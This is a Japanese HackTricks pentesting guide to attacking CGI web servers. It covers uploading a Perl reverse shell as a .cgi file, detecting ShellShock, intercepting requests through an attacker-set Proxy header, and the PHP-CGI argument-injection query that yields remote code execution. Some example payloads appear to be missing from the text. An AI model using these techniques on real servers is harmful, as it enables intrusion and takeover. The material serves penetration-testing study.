CGI
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
CGIスクリプトはperlスクリプトです。したがって、_.cgi_スクリプトを実行できるサーバーを侵害した場合、perlリバースシェル (/usr/share/webshells/perl/perl-reverse-shell.pl
) をアップロードし、拡張子を**.plから.cgiに変更し、実行権限を与え (chmod +x
)、ウェブブラウザからリバースシェルにアクセス**して実行できます。 CGI脆弱性をテストするには、nikto -C all
(およびすべてのプラグイン)を使用することをお勧めします。
ShellShockは、Unixベースのオペレーティングシステムで広く使用されているBashコマンドラインシェルに影響を与える脆弱性です。これは、アプリケーションによって渡されたコマンドを実行するBashの能力をターゲットにしています。この脆弱性は、環境変数の操作にあります。環境変数は、コンピュータ上でプロセスがどのように実行されるかに影響を与える動的な名前付き値です。攻撃者は、環境変数に悪意のあるコードを添付することでこれを悪用し、変数を受け取ると実行されます。これにより、攻撃者はシステムを侵害する可能性があります。
この脆弱性を悪用すると、ページがエラーを返す可能性があります。
この脆弱性を見つけるには、古いApacheバージョンとcgi_mod (cgiフォルダーを含む)を使用していることに気づくか、niktoを使用します。
ほとんどのテストは、何かをエコーし、その文字列がウェブレスポンスに返されることを期待することに基づいています。ページが脆弱である可能性があると思われる場合は、すべてのcgiページを検索してテストしてください。
Nmap
CGIは、httpリクエストの各ヘッダーに対して環境変数を作成します。例えば:「host:web.com」は「HTTP_HOST"="web.com」として作成されます。
HTTP_PROXY変数はWebサーバーによって使用される可能性があります。ヘッダーに「Proxy: <IP_attacker>:<PORT>」を含めて送信してみてください。そして、サーバーがセッション中にリクエストを実行する場合、サーバーが行った各リクエストをキャプチャすることができます。
基本的に、cgiがアクティブで、phpが「古い」(<5.3.12 / < 5.4.2)場合、コードを実行できます。 この脆弱性を悪用するには、パラメータを送信せずに(特に「=」文字を送信せずに)WebサーバーのPHPファイルにアクセスする必要があります。 次に、この脆弱性をテストするために、例えば/index.php?-s
にアクセスすると( -s
に注意)、アプリケーションのソースコードがレスポンスに表示されます。
次に、RCEを取得するために、この特別なクエリを送信できます:/?-d allow_url_include=1 -d auto_prepend_file=php://input
とリクエストのボディ内で実行されるPHPコード。 例:**
脆弱性と可能なエクスプロイトに関する詳細情報: https://www.zero-day.cz/database/337/, cve-2012-1823, cve-2012-2311, CTFの解説例.
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE) GCPハッキングを学び、実践する: HackTricks Training GCP Red Team Expert (GRTE)